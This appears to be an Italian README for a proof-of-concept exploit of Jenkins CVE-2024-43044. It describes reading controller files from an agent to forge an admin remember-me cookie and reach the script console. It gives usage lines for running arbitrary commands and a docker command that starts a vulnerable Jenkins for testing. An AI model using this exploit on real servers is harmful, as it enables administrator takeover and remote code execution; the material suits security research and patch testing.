
Exploit per la vulnerabilità CVE-2024-43044 in Jenkins
Questo è un exploit per CVE-2024-43044, una lettura arbitraria di file che permette a un agente di recuperare file dal controller.
L'exploit sfrutterà la vulnerabilità per leggere file al fine di falsificare un cookie remember-me per un account amministratore e ottenere accesso al motore di scripting di Jenkins.
Consulta l'analisi completa su https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
mvn package
Exploit Usages:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
Puoi testarlo in una versione vulnerabile usando docker:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
Una volta che hai un Jenkins in esecuzione, configura un agente.
La connessione controller/agente può essere predefinita (usando url, nodename, secret) o tramite SSH.
.